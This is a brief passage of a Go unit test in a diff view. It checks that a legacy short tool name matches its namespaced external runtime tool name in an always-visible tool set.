t.Parallel()
set := expandAlwaysVisibleNameSet([]string{"discount_search"})
if !toolMatchesAlwaysVisible("zhidemai__discount_search", set) {
t.Fatal("legacy short name should match external runtime tool")
}
}

Some files were not shown because too many files have changed in this diff Show More